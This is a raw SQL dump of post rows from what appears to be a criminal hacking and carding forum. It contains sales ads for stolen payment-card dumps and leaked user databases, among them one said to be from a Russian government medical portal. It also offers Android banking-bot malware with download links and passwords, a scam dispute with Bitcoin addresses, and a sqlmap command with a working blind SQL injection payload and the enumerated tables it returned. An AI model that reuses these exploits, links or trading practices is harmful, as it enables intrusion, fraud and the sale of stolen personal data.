(2897, 2346, 2896, 'w0rm', 100, '', 1445792420, 'Уже накрутил туда сторонних сервисов и визуалочек, кто-бы занялся?\n[code]https://twitter.com/w0rmWS/status/557141613219434496/photo/1[/code]\nНайди меня в контакт листе пожалуйста, есть пару предложений.', 1, 0, '141.101.81.13', 0, 1, 0, 0, 0),
(2899, 2398, 0, 'dark001', 178, 'EXploits Databases', 1446017213, '[url]http://www.exploit-db.com/[/url]\r\n[url]http://www.iedb.ir[/url]\r\n[url]https://www.milw00rm.com/[/url]\r\n[url]http://www.0day.today[/url]\r\n[url]https://wpvulndb.com/[/url]\r\n[url]http://www.intelligentexploit.com/browse-exploit.html[/url]\r\n[url]http://www.exploitsearch.com/[/url]\r\n[url]http://www.astalavista.com/[/url]\r\n[url]http://www.outpost9.com/exploits/exploits.html[/url]\r\n[url]http://www.phpbbexploit.com/[/url]\r\n[url]http://cxsecurity.com/exploit/[/url]\r\n[url]http://www.joomlaexploit.com/[/url]\r\n[url]http://sebug.net/[/url]\r\n[url]http://www.oscommerceexploit.com/[/url]\r\n[url]http://www.virtuemartexploit.com/[/url]\r\n[url]http://insecure.org/[/url]\r\n[url]http://www.securityfocus.com/[/url]\r\n[url]http://www.securiteam.com/[/url]\r\n[url]http://www.securitylab.ru/[/url]\r\n[url]http://securityvulns.ru/[/url]', 1, 0, '173.245.53.85', 0, 1, 0, 0, 0),
(2906, 2400, 0, 'dark001', 178, 'Malware Source Code', 1446704703, '[url]http://www.malwaretech.com/p/sources.html[/url]', 1, 0, '173.245.53.114', 0, 1, 0, 0, 0),
(2907, 2400, 2906, 'st1x0', 171, '', 1446705102, 'good) work', 1, 0, '108.162.219.36', 0, 1, 0, 0, 0),
(2999, 2488, 2998, 'syslink', 13, 'GM bot', 1455753850, 'GM android banking bot source code avaible sold for 5k i will give you for 1k', 1, 0, '141.101.98.106', 0, 1, 0, 0, 0),
(3000, 2488, 2999, 'apimaster', 196, '', 1455783042, '[QUOTE=syslink;2999]GM android banking bot source code avaible sold for 5k i will give you for 1k[/QUOTE]\r\n\r\nGM ? [url]https://yadi.sk/d/wgwBNDGcnkXYr[/url] пасс: $#TGR#RWEdwfwe\r\n0$', 1, 0, '108.162.222.37', 14, 1, 0, 0, 0),
(2931, 2417, 0, 'unixman', 309, 'stells is ripper that i did escrow with', 1448155601, 'i did escrow with stells with me and raf101 and deal didnt work out and suddenly he tell me sent my money and i didn\'t get it for 3 days i have been iming didnt reply when i post him on infraud, banned my ass here PROOF [url]https://www.sendspace.com/file/1kr6r7[/url]\r\n\r\n\r\n\r\n (8:17:17 PM) [email]unixman@jabber.iitsp.com[/email]/84aec995: he confrim it?\r\n (8:17:45 PM) [email]unixman@jabber.iitsp.com[/email]/84aec995: he told me he just spoke to you\r\n (8:22:29 PM) The encrypted message received from [email]stells-infr@jabber.ru[/email] is unreadable, as you are not currently communicating privately.\r\n (11/17/2015 9:28:37 AM) [email]unixman@jabber.iitsp.com[/email]/73ced020: ??\r\n (9:29:30 AM) [email]unixman@jabber.iitsp.com[/email]/73ced020: you there\r\n (9:37:13 AM) [email]unixman@jabber.iitsp.com[/email]/73ced020: 1FNpUbLwpMSMrCdQWSkDejP1p9Psa4aNs4\r\n (10:06:58 AM) The encrypted message received from [email]stells-infr@jabber.ru[/email] is unreadable, as you are not currently communicating privately.\r\n (11:10:25 AM) Attempting to start a private conversation with [email]stells-infr@jabber.ru[/email]...\r\n [Image] (11:10:26 AM) Unverified conversation with [email]stells-infr@jabber.ru[/email]/Sergeys-MacBook-Pro started. Your client is not logging this conversation.\r\n (11:10:32 AM) [email]unixman@jabber.iitsp.com[/email]/73ced020: hey u there\r\n (11:11:09 AM) [email]unixman@jabber.iitsp.com[/email]/73ced020: are we ready to roll, bc raf101 confirmed with you\r\n (11:11:25 AM) [email]stells-infr@jabber.ru[/email]: yesss, i said already\r\n (11:11:28 AM) [email]stells-infr@jabber.ru[/email]: 2500 right?\r\n (11:11:33 AM) [email]unixman@jabber.iitsp.com[/email]/73ced020: 2600\r\n (11:11:42 AM) [email]stells-infr@jabber.ru[/email]: -5%, 130\r\n (11:11:48 AM) [email]stells-infr@jabber.ru[/email]: sending now\r\n (11:12:22 AM) [email]unixman@jabber.iitsp.com[/email]/73ced020: yeah i sent 2600 plus ur fee which was total 2730 or something like that\r\n (11:12:37 AM) [email]stells-infr@jabber.ru[/email]: i told you there will be more charge\r\n (11:12:48 AM) [email]stells-infr@jabber.ru[/email]: for extra time as it\'s 3 months dealing\r\n (11:12:58 AM) [email]stells-infr@jabber.ru[/email]: sent\r\n (11:12:59 AM) [email]unixman@jabber.iitsp.com[/email]/73ced020: ok...\r\n (1:39:08 PM) [email]unixman@jabber.iitsp.com[/email]/73ced020: it been couple of hours i still didnt recieved it...\r\n (2:32:13 PM) [email]unixman@jabber.iitsp.com[/email]/73ced020: yo stells i hpe you didnt send it to the wrong one\r\n (2:33:13 PM) [email]unixman@jabber.iitsp.com[/email]/73ced020: ecause i see one amount similar amount 2400 to different btc\r\n (2:40:08 PM) [email]unixman@jabber.iitsp.com[/email]/73ced020: [url]https://blockchain.info/address/1Kc9...nUSrjrUcfDyytV[/url]\r\n (2:40:32 PM) [email]unixman@jabber.iitsp.com[/email]/73ced020: i dont know if that mistake but for sure it not mind, i just sent you my btc info\r\n (3:16:46 PM) [email]unixman@jabber.iitsp.com[/email]/73ced020: This is myne... 1FNpUbLwpMSMrCdQWSkDejP1p9Psa4aNs4\r\n\r\n (6:53:05 PM) [email]unixman@jabber.iitsp.com[/email]/73ced020: bro you there\r\n (6:53:15 PM) [email]unixman@jabber.iitsp.com[/email]/73ced020: you came back you didnt reply to my message\r\n (6:53:49 PM) [email]unixman@jabber.iitsp.com[/email]/73ced020: ??\r\n (10:56:15 PM) [email]unixman@jabber.iitsp.com[/email]/73ced020: ?\r\n (11/18/2015 1:52:18 AM) [email]unixman@jabber.iitsp.com[/email]/73ced020: stells you there, what going on man\r\n (1:53:58 AM) Buzzing [email]stells-infr@jabber.ru[/email]...\r\n (9:07:36 AM) [email]unixman@jabber.iitsp.com[/email]/73ced020: yo stells are you there\r\n (12:55:47 PM) [email]unixman@jabber.iitsp.com[/email]/73ced020: ??????????????????????????????????????????????\r\n (12:59:33 PM) [email]unixman@jabber.iitsp.com[/email]/73ced020: helloooo\r\n (1:00:11 PM) [email]unixman@jabber.iitsp.com[/email]/73ced020: bro you ignoring me\r\n (2:57:36 PM) Buzzing [email]stells-infr@jabber.ru[/email]...\r\n (6:15:41 PM) [email]unixman@jabber.iitsp.com[/email]/712c8fe0: yo stells what going on man\r\n (6:16:01 PM) [email]unixman@jabber.iitsp.com[/email]/712c8fe0: wtf man talk to me\r\n (11/19/2015 2:44:32 AM) [email]unixman@jabber.iitsp.com[/email]/712c8fe0: stells you there\r\n (2:45:03 AM) [email]unixman@jabber.iitsp.com[/email]/712c8fe0: wake up man\r\n (7:30:57 PM) [email]unixman@jabber.iitsp.com[/email]/a5087bec: yo you there\r\n (7:31:12 PM) [email]unixman@jabber.iitsp.com[/email]/a5087bec: why are you ignoring me man\r\n (7:33:31 PM) [email]unixman@jabber.iitsp.com[/email]/a5087bec: yo you think ur sick from banning me\r\n (7:33:54 PM) [email]unixman@jabber.iitsp.com[/email]/a5087bec: you fucking ripper i will tell me people how you are\r\n (7:37:44 PM) [email]unixman@jabber.iitsp.com[/email]/a5087bec: you how many members i know he, you dick!! you think there not going to know?\r\n (7:37:59 PM) [email]unixman@jabber.iitsp.com[/email]/a5087bec: i am not new kid on the block i will cross my message', 1, 0, '162.158.89.17', 0, 1, 0, 0, 0),
(3043, 2504, 0, 'Scrack', 308, '(REQ) GM Cryptolocker', 1462955681, 'someone has this botnet for android\r\n\r\n[IMG]https://blogdotsensecydotcom.files.wordpress.com/2015/08/3.png[/IMG]', 1, 0, '190.94.104.25', 0, 1, 0, 0, 0),
(2921, 2410, 2920, 'intrip', 169, '', 1447331945, 'this shop is fake', 1, 0, '141.101.104.54', 0, 1, 0, 0, 0),
(2924, 2410, 2921, 'FoxDesierto', 287, '', 1447373141, 'It is true but there is more shops WHO Have This problem must be careful', 1, 0, '108.162.215.41', 0, 1, 0, 0, 0),
(2925, 2413, 0, 'ValidFlash', 294, 'I am good seller for eu,usa,canada dumps only .', 1447485371, 'I AM GOOD SELLER FOR EU,USA,CANADA DUMPS ONLY .\r\n\r\nPLEASE DON\'T ASK ME FOR ASIA DUMPS\r\nBECAUSE I DON\'T HAVE .......\r\n\r\nUSA dumps\r\nclassics: 25$\r\nplatinum: 30$\r\ngold: 30$\r\npurchasing:60$\r\nsignature: 40$\r\n\r\nEU dumps\r\nclassics: 60$\r\nplatinum: 80$\r\nand business: 90$\r\ngold: 70$\r\ninfinite: 120$\r\n\r\nCanada dumps\r\nClassic : 35$\r\nPLatinum :40$\r\nBusiness : 50$\r\nGold : 45$\r\nSignature :60$\r\n\r\nRULES:\r\nPayments only through BTC\r\n\r\nInstant Delivery\r\n\r\nNo Minimum order\r\n\r\nDumps checking by ask, I don\'t replace checked stuff!\r\n\r\nLost/Stolen Replace in 24 hours!!\r\n\r\nReplayce always will be checked!\r\n\r\nNo replace for region lock!\r\n\r\nNo Free No Test Dumps!!\r\nIf You are Good Customer You Order More dumps I Give Good Discount ........And Bonus\r\nI Need Good Customers For Long Team Business for Long Period\r\nBINLIST AVAILABLE ONLY FOR GOOD CUSTOMERS\r\n\r\nI Am Dumps Vendor I offer Only Dumps and My Validity Rate IS 90%% Working\r\n\r\nYou Can Contact me On\r\nICQ: 334881\r\nEmail : [email]Pa1d_gh0st@yahoo.com[/email]\r\n\r\nI Am Online Serving now\r\n\r\nDont Add me On messenger You Just Send me Email I will Reply You always Base Available To server You', 1, 0, '141.101.104.89', 0, 1, 0, 0, 0),
(2919, 2346, 2801, 'mo-dem', 286, '', 1447174089, '[QUOTE=w0rm;2801]- carder.su\r\n- carder.pro\r\n- carders.cc\r\n- carderplanet.biz\r\n- forum.xakepok.org\r\n- green-hack.net\r\n- inattack\r\n- kiber-zona.org\r\n- verified.ms\r\n- antichat \r\n- asechka\r\n- blackseoschool\r\n- cih\r\n- damagelab\r\n- darklife\r\n- dehak.ru\r\n- exploit.in\r\n- hackzone\r\n- kode.cc\r\n- maza\r\n- korovka.cc\r\n- milw0rm\r\n\r\nAll for 500$.[/QUOTE]\nNe sovsem ponyal, a chto imenno prodaetsya? Dostup, ili bd?', 1, 0, '173.245.54.202', 0, 1, 0, 0, 0),
(2920, 2410, 0, 'FoxDesierto', 287, '[SQLi]shopcc.ru', 1447203548, '[PHP]sqlmap.py --url=\"http://shopcc.ru/logins.php\" --data=\"btnLogin=Login&btnCancel=Register&continues=http://shopcc.ru/index.php&remember=on&txtPass=g00dPa%24%24w0rD&txtUser=1\" -p \"txtUser\" --random-agent --time-sec=\"10\" --dbms=\"mysql\" --dbs --tables --exclude-sys[/PHP]\r\n\r\n\r\n[HTML]---\r\nParameter: txtUser (POST)\r\n Type: AND/OR time-based blind\r\n Title: MySQL >= 5.0.12 AND time-based blind (SELECT)\r\n Payload: btnLogin=Login&btnCancel=Register&continues=http://shopcc.ru/index.php&remember=on&txtPass=g00dPa$$w0rD&txtUser=fox\' AND (SELECT * FROM (SELECT(SLEEP(10)))XIhO) AND \'hUIW\'=\'hUIW\r\n---\r\nweb application technology: PHP 5.3.13\r\nback-end DBMS: MySQL >= 5.0.0\r\navailable databases [2]:\r\n[*] information_schema\r\n[*] shopcc_ru_\r\n\r\nDatabase: shopcc_ru_\r\n[45 tables]\r\n+------------------------+\r\n| action |\r\n| ordero |\r\n| access |\r\n| ad |\r\n| adcriteria |\r\n| adminhelp |\r\n| administrator |\r\n| adminlog |\r\n| adminmessage |\r\n| adminutil |\r\n| ads |\r\n| album |\r\n| albumupdate |\r\n| announcement |\r\n| announcementread |\r\n| attachment |\r\n| attachmentcategory |\r\n| attachmentcategoryuser |\r\n| attachmentpermission |\r\n| attachmenttype |\r\n| attachmentviews |\r\n| avatar |\r\n| bank_fullz |\r\n| bank_logins |\r\n| bbcode |\r\n| bbcode_video |\r\n| bins |\r\n| bonus |\r\n| cards |\r\n| carts |\r\n| categorys |\r\n| checks |\r\n| configs |\r\n| groups |\r\n| mess |\r\n| messages |\r\n| other |\r\n| paypal |\r\n| plans |\r\n| tools |\r\n| transfers |\r\n| uithdraw |\r\n| upgrades |\r\n| users |\r\n| zipcodes |\r\n+------------------------+[/HTML]', 1, 0, '108.162.215.41', 0, 1, 0, 0, 0),
(2932, 2418, 0, 'dark001', 178, 'Hacking Tools resources list', 1448260568, 'Hi everyone, I am posting an interesting list of hacking, Pen Test and security tool, enjoy\r\n\r\nTor Onion Links\r\n\r\n [url]https://www.torproject.org/[/url]\r\n [url]http://www.hiddenwiki.info/[/url]\r\n [url]http://tt3j2x4k5ycaa5zt.onion.link/onions.php?addr=lulzwrzcle5ks3se[/url]\r\n\r\nSecurity Methodologies\r\n\r\n [url]http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html[/url]\r\n [url]http://www.pentest-standard.org/index.php/Main_Page[/url]\r\n [url]https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project[/url]\r\n [url]http://yehg.net/lab/pr0js/misc/wasarg_owasp-tgv4_with_ref.php[/url]\r\n [url]http://www.social-engineer.org/[/url]\r\n [url]http://projects.webappsec.org/w/page/13246927/FrontPage[/url]\r\n [url]https://www.sans.org/reading-room/whitepapers/auditing/base-security-assessment-methodology-1587[/url]\r\n [url]http://www.isecom.org/research/osstmm.html[/url]\r\n\r\nTraining/Classes/Video\r\n\r\n [url]https://exploit-exercises.com[/url]\r\n [url]https://www.cybrary.it/cyber-security/[/url]\r\n [url]http://www.irongeek.com/i.php?page=videos/aide-winter-2011[/url]\r\n [url]https://lab.pentestit.ru/pentestlabs/3[/url]\r\n [url]https://trailofbits.github.io/ctf/[/url]\r\n [url]http://ctf.forgottensec.com/wiki/?title=Main_Page[/url]\r\n [url]http://smashthestack.org/[/url]\r\n [url]http://ctf.hcesperer.org/[/url]\r\n [url]https://www.google.com/calendar/feeds/noge7b1rg2dg4a8kcm1k68vbjg@group.calendar.google.com/public/basic[/url]\r\n [url]https://www.google.com/calendar/embed?src=pe2ikdbe6b841od6e26ato0asc@group.calendar.google.com&gsessionid=OK[/url]\r\n [url]https://crypto.stanford.edu/cs155/[/url]\r\n [url]https://www.offensive-security.com/metasploit-unleashed/[/url]\r\n [url]http://www.irongeek.com/i.php?page=videos/metasploit-class[/url]\r\n [url]http://www.securitytube.net/[/url]\r\n \r\n\r\nPentest Tools\r\n\r\n [url]https://github.com/pwnwiki/pwnwiki.github.io[/url]\r\n [url]https://github.com/sbilly/awesome-security[/url]\r\n [url]https://github.com/paragonie/awesome-appsec[/url]\r\n [url]https://github.com/enaqx/awesome-pentest[/url]\r\n [url]https://github.com/kahun/awesome-sysadmin#security[/url]\r\n [url]http://beefproject.com/[/url]\r\n [url]https://xsser.03c8.net/[/url]\r\n [url]https://code.google.com/p/fuzzdb/[/url]\r\n [url]http://www.amanhardikar.com/mindmaps/PracticeUrls.html[/url]\r\n [url]https://www.kali.org/[/url]\r\n [url]https://www.owasp.org/index.php/OWASP_Web_Testing_Environment_Project[/url]\r\n [url]http://blackarch.org/[/url]\r\n [url]https://code.google.com/p/owaspbwa/[/url]\r\n [url]https://www.mavensecurity.com/web_security_dojo/[/url]\r\n [url]http://hackingdojo.com/dojo-media/[/url]\r\n [url]http://informatica.uv.es/~carlos/docencia/netinvm/[/url]\r\n [url]http://www.bonsai-sec.com/en/research/moth.php[/url]\r\n [url]http://sourceforge.net/projects/metasploitable/files/Metasploitable2/[/url]\r\n [url]http://sourceforge.net/projects/lampsecurity/?source=navbar[/url]\r\n [url]https://www.hacking-lab.com/index.html[/url]\r\n [url]http://sourceforge.net/projects/virtualhacking/files/[/url]\r\n [url]http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10[/url]\r\n [url]http://www.dvwa.co.uk/[/url]\r\n [url]http://sourceforge.net/projects/thebutterflytmp/[/url]\r\n [url]http://magikh0e.ihtb.org/pubPapers/[/url]\r\n\r\nMetasploit\r\n\r\n [url]http://resources.metasploit.com/[/url]\r\n [url]http://netsec.ws/?p=262[/url]\r\n [url]http://seclists.org/metasploit/[/url]\r\n [url]https://www.offensive-security.com/metasploit-unleashed/Introduction/[/url]\r\n [url]http://www.offensive-security.com/metasploit-unleashed/Msfvenom[/url]\r\n [url]https://community.rapid7.com/community/metasploit/[/url]\r\n [url]http://www.securitytube.net/video/711?q=METASPLOIT[/url]\r\n [url]https://en.wikibooks.org/wiki/Metasploit[/url]\r\n [url]https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf[/url]\r\n [url]http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html[/url]\r\n [url]https://github.com/rapid7/metasploit-framework/wiki/Meterpreter[/url]\r\n [url]https://www.blackhat.com/presentations/bh-dc-10/Egypt/BlackHat-DC-2010-Egypt-UAV-slides.pdf[/url]\r\n\r\nNet Scanners\r\n\r\n [url]https://nmap.org/[/url]\r\n [url]https://nmap.org/nsedoc/[/url]\r\n [url]http://www.securitytube.net/video/931[/url]\r\n [url]https://nmap.org/nsedoc/[/url]\r\n [url]http://www.openvas.org/[/url]\r\n [url]http://www.tenable.com/products/nessus-vulnerability-scanner[/url]\r\n [url]https://www.rapid7.com/products/nexpose/compare-downloads.jsp[/url]\r\n [url]http://www.inguardians.com/research/docs/Skoudis_pentestsecrets.pdf[/url]\r\n\r\n\r\nPhase 1 - Reconnaissance: Information Gathering before the Attack\r\n\r\n [url]https://en.wikipedia.org/wiki/Open-source_intelligence[/url]\r\n [url]http://www.spylogic.net/2009/10/enterprise-open-source-intelligence-gathering-part-1-social-networks/[/url]\r\n [url]http://www.spylogic.net/2009/10/enterprise-open-source-intelligence-gathering-%E2%80%93-part-2-blogs-message-boards-and-metadata/[/url]\r\n [url]http://www.spylogic.net/2009/10/enterprise-open-source-intelligence-gathering-part-3-monitoring/[/url]\r\n [url]http://www.slideshare.net/Laramies/tactical-information-gathering[/url]\r\n [url]http://www.infond.fr/2010/05/toturial-footprinting.html[/url]\r\n\r\n\r\nPhase 1.2 - Infastructure\r\n\r\n [url]http://uptime.netcraft.com/[/url]\r\n [url]http://www.shodanhq.com/[/url]\r\n [url]http://www.domaintools.com/[/url]\r\n [url]http://centralops.net/co/[/url]\r\n [url]http://whois.webhosting.info/[/url]\r\n [url]https://www.ssllabs.com/ssltest/analyze.html[/url]\r\n [url]https://www.exploit-db.com/google-hacking-database/[/url]\r\n [url]http://www.my-ip-neighbors.com/[/url]\r\n\r\nPhase 1.2 - Tools\r\n\r\n OSINT Tools\r\n [url]http://www.edge-security.com/theharvester.php[/url]\r\n [url]http://www.edge-security.com/metagoofil.php[/url]\r\n [url]http://www.paterva.com/web6/[/url]\r\n [url]https://www.sans.org/reading-room/whitepapers/privacy/document-metadata-silent-killer-32974[/url]\r\n [url]http://www.sno.phy.queensu.ca/~phil/exiftool/[/url]\r\n [url]http://www.darkoperator.com/blog/2009/4/24/metadata-enumeration-with-foca.html[/url]\r\n\r\nPhase 2 - Enumeration: Finding Attack Vectors\r\n\r\n [url]http://securitysynapse.blogspot.be/2013_08_01_archive.html[/url]\r\n [url]https://hackertarget.com/attacking-wordpress/[/url]\r\n [url]https://code.google.com/p/pentest-bookmarks/wiki/BookmarksList[/url]\r\n [url]http://www.0daysecurity.com/penetration-testing/enumeration.html[/url]\r\n [url]https://github.com/n3ko1/WrapMap[/url]\r\n [url]https://cirt.net/Nikto2[/url]\r\n [url]http://www.unixmen.com/install-nikto-web-scanner-check-vulnerabilities/[/url]\r\n [url]http://seclist.us/autoenum-nmap-enumeration-and-script-scan-automation-script.html[/url]\r\n [url]http://code.stephenmorley.org/articles/xampp-version-history-apache-mysql-php/[/url]\r\n [url]http://carnal0wnage.attackresearch.com/2007/07/over-in-lso-chat-we-were-talking-about.html[/url]\r\n [url]http://www.iodigitalsec.com/windows-null-session-enumeration/[/url]\r\n [url]https://pen-testing.sans.org/blog/2013/07/24/plundering-windows-account-info-via-authenticated-smb-sessions[/url]\r\n [url]http://carnal0wnage.attackresearch.com/2007/07/enumerating-user-accounts-on-linux-and.html[/url]\r\n [url]https://github.com/isaudits/autoenum[/url]\r\n [url]http://www.webpronews.com/snmp-enumeration-and-hacking-2003-09[/url]\r\n [url]http://carnal0wnage.attackresearch.com/2007/07/over-in-lso-chat-we-were-talking-about.html[/url]\r\n [url]http://www.iodigitalsec.com/windows-null-session-enumeration/[/url]\r\n [url]http://pen-testing.sans.org/blog/2013/07/24/plundering-windows-account-info-via-authenticated-smb-sessions[/url]\r\n [url]http://carnal0wnage.attackresearch.com/2007/07/enumerating-user-accounts-on-linux-and.html[/url]\r\n [url]http://www.madirish.net/59a[/url]\r\n\r\nPhase 3 - Exploitation: Verifying Security Weaknesses\r\n\r\n [url]http://pwnwiki.io[/url]\r\n [url]http://download.vulnhub.com/pentesterlab/php_include_and_post_exploitation.pdf[/url]\r\n [url]http://ru.scribd.com/doc/245679444/hak5-org-OSXPost-Exploitation-copy-20130228-pdf#scribd[/url]\r\n [url]https://cyberwar.nl/d/hak5.org_LinuxUnixBSDPost-ExploitationCommandList_copy-20130228.pdf[/url]\r\n [url]https://www.yumpu.com/en/document/view/14963680/from-sqli-to-shell[/url]\r\n\r\nDump Windows Password Hashes\r\n\r\n [url]http://bernardodamele.blogspot.com/2011/12/dump-windows-password-hashes.html[/url]\r\n\r\nWindows Passhing The Hash\r\n\r\n [url]https://www.kali.org/penetration-testing/passing-hash-remote-desktop/[/url]\r\n [url]https://www.kali.org/kali-monday/pass-the-hash-toolkit-winexe-updates/[/url]\r\n\r\nWindows Privilege Escalation\r\n\r\n [url]http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/[/url]\r\n [url]https://github.com/0xdeafbeef/PSSecSnapshot[/url]\r\n [url]http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html[/url]\r\n [url]http://www.fuzzysecurity.com/tutorials/16.html[/url]\r\n [url]http://www.youtube.com/watch?v=kMG8IsCohHA[/url]\r\n [url]http://www.youtube.com/watch?v=_8xJaaQlpBo[/url]\r\n [url]http://www.greyhathacker.net/?p=738[/url]\r\n [url]http://bernardodamele.blogspot.ru/2011/12/dump-windows-password-hashes.html[/url]\r\n\r\nLinux Privilege Escalation\r\n\r\n [url]http://incolumitas.com/wp-content/uploads/2012/12/blackhats_view.pdf[/url]\r\n [url]http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html[/url]\r\n [url]http://pentestmonkey.net/tools/audit/unix-privesc-check[/url]\r\n [url]http://www.rebootuser.com/?page_id=1721[/url]\r\n [url]http://www.rebootuser.com/?p=1758[/url]\r\n [url]http://www.rebootuser.com/?p=1623[/url]\r\n [url]http://insidetrust.blogspot.nl/2011/04/quick-guide-to-linux-privilege.html[/url]\r\n\r\n\r\nXSS Cheat Codes\r\n\r\n [url]http://www.xenuser.org/xss-cheat-sheet/[/url]\r\n [url]https://gist.github.com/sseffa/11031135[/url]\r\n [url]https://html5sec.org/[/url]\r\n\r\nWebShells\r\n\r\n [url]http://www.r57shell.net/[/url]\r\n [url]https://github.com/b374k/b374k[/url]\r\n [url]https://github.com/epinna/weevely3[/url]\r\n\r\nSQLi General Resources\r\n\r\n [url]http://www.w3schools.com/sql/sql_injection.asp[/url]\r\n [url]http://sqlzoo.net/hack/[/url]\r\n [url]https://information.rapid7.com/rs/rapid7/images/R7%20SQL_Injection_Cheat_Sheet.v1.pdf[/url]\r\n [url]http://websec.ca/kb/sql_injection[/url]\r\n [url]http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/[/url]\r\n [url]http://www.unixwiz.net/techtips/sql-injection.html[/url]\r\n [url]http://www.sqlinjectionwiki.com/[/url]\r\n [url]http://sqlmap.org/[/url]\r\n [url]https://packetstorm.sigterm.no/papers/cheatsheets/sqlmap-cheatsheet-1.0-SDB.pdf[/url]\r\n [url]https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet[/url]\r\n [url]http://bobby-tables.com/[/url]\r\n [url]https://spike188.wordpress.com/category/blind-sql-injection/[/url]\r\n [url]http://securityidiots.com/Web-Pentest/SQL-Injection[/url]', 1, 0, '173.245.53.85', 0, 1, 0, 0, 0),
(2933, 2342, 2800, 'w0rm', 100, '', 1448806747, '[url]http://i.imgur.com/i6u2Ua5.png[/url] once again!', 1, 0, '141.101.80.23', 0, 1, 0, 0, 0),
(2942, 1092, 2225, 'baltazar', 305, '', 1449432404, 'Продам дамп coru.ws , цена 50 $\r\n\r\nС проверенным разделом\r\n\r\n[IMG]http://i10.pixs.ru/storage/0/9/1/1png_2136210_19775091.png[/IMG]', 1, 0, '188.114.103.241', 0, 1, 0, 0, 0),
(3046, 2506, 0, 'ke7hb', 387, 'BitTorrent', 1463762659, 'BitTorrent forum db\r\n34k users\r\nname email ip_address concat(members_pass_hash,\':\',members_pass_salt) \r\n\r\nPrice: OFFER ME\r\n\r\nJabber: [email]ke7hb@w0rm.ws[/email]', 1, 0, '109.124.31.140', 0, 1, 0, 0, 0),
(2958, 1092, 2942, 'balt', 344, '', 1450821201, '[quote=baltazar;2942]Продам дамп coru.ws , цена 50 $\r\n\r\nС проверенным разделом\r\n\r\n[img]http://i10.pixs.ru/storage/0/9/1/1png_2136210_19775091.png[/img][/quote]\r\n\r\nПишите в лс', 1, 0, '162.158.88.99', 0, 0, 0, 0, 0),
(3026, 2497, 0, 'orion', 283, 'MATE1 database', 1458612896, '27 million email, name, password and more in plaintext. \r\n\r\nSelling for 12 BTC. private message me if you want to buy.\r\n\r\nThis database is not leaked. A disgruntled buyer who demanded a higher price leaked a small sample (500 users), but rest is all unleaked.', 1, 0, '79.98.107.90', 0, 1, 0, 0, 0),
(2980, 1025, 2978, 'negeeb', 161, '', 1453453075, 'reupload pls', 1, 0, '198.41.226.13', 0, 1, 0, 0, 0),
(2978, 1025, 1028, 'fredholmes', 382, '', 1452775000, 'Can you please reup this?', 1, 0, '108.162.222.24', 0, 1, 0, 0, 0),
(2982, 1025, 2980, 'tdss', 173, '', 1453510686, '[QUOTE=negeeb;2980]reupload pls[/QUOTE]\n\nit\'s already been asked by someone else. posting a second time, regardless of which person posts, is unnecessary. I won\'t delete it, but please consider this in the future.\n\nAs for the file, I do not have it; wait for W0rm.', 1, 0, '173.245.54.190', 0, 1, 0, 0, 0),
(2983, 1025, 2980, 'apimaster', 196, '', 1453529413, '[QUOTE=negeeb;2980]reupload pls[/QUOTE]\r\n\r\npanel:\r\n\r\n[url]http://www.megafileupload.com/ix83/gaz.zip[/url]\r\n\r\ninfo:\r\n\r\n[url]https://mega.nz/#!vJphlLQR!GYikEazIYIkAgM2JJ7GlKiRwil1of46NqT3LnHBGaXg[/url]', 1, 0, '108.162.222.205', 0, 1, 0, 0, 0),
(2985, 1025, 2983, 'tdss', 173, '', 1453649532, '[QUOTE=apimaster;2983]panel:\r\n\r\n[url]http://www.megafileupload.com/ix83/gaz.zip[/url]\r\n\r\ninfo:\r\n\r\n[url]https://mega.nz/#!vJphlLQR!GYikEazIYIkAgM2JJ7GlKiRwil1of46NqT3LnHBGaXg[/url][/QUOTE]\r\n\r\nOP link updated, thanks. Hope you don\'t mind I\'ve uploaded to a friendlier host.', 1, 0, '173.245.54.190', 0, 1, 0, 0, 0),
(2990, 2484, 0, 'w0rm', 100, 'k-vrachu.ru dumps+src', 1454595678, 'Russian goverment medical portal.\n[url]https://so.k-vrachu.ru/design/common/fm/[/url]\ndoctor30.ru/design/common/fm/\nrb.k-vrachu.ru\netc.\n\npass:rider\n\nin db over 500 000 users\n\n[url]https://drive.google.com/open?id=0B0ox2xf_0TMjMG1aXzd1dmhWTzA[/url]', 1, 0, '141.101.81.233', 0, 1, 0, 0, 0),
(2993, 1057, 1063, 'Scrack', 308, '', 1454819480, 'upload again', 1, 0, '108.162.219.114', 0, 1, 0, 0, 0),
(2994, 1057, 2993, 'tdss', 173, '', 1455212696, 'With panel and cracked (updated) but without source (sorry, don\'t have it): [url]https://upload.freehacks.ru/SDWNg0[/url]\n\nPassword is: w0rm', 1, 0, '108.162.219.59', 0, 1, 0, 0, 0),
(2996, 2488, 0, 'Scrack', 308, '(REQ)Android Botnet', 1455433172, 'someone can upload some botnet android with your panel and source code\r\nfor my project', 1, 0, '108.162.237.16', 4, 1, 0, 0, 0),
(2997, 2488, 2996, 'tdss', 173, '', 1455467727, 'Are you looking for something new and unreleased, or leaked code?', 1, 0, '173.245.54.190', 0, 1, 0, 0, 0),
(2998, 2488, 2997, 'Scrack', 308, '', 1455478900, 'I\'m looking for something new and also leaked code', 1, 0, '108.162.219.114', 0, 1, 0, 0, 0),
(3003, 1092, 2942, 'gago21', 211, '', 1456070598, '[B]link plss :([/B]', 1, 0, '141.101.104.141', 0, 0, 0, 0, 0),
(3006, 2488, 3001, 'Scrack', 308, '', 1456182150, 'iBanking source code is not complete\n\nthanks you for the code and more for GM android', 1, 0, '108.162.219.114', 0, 1, 0, 0, 0),
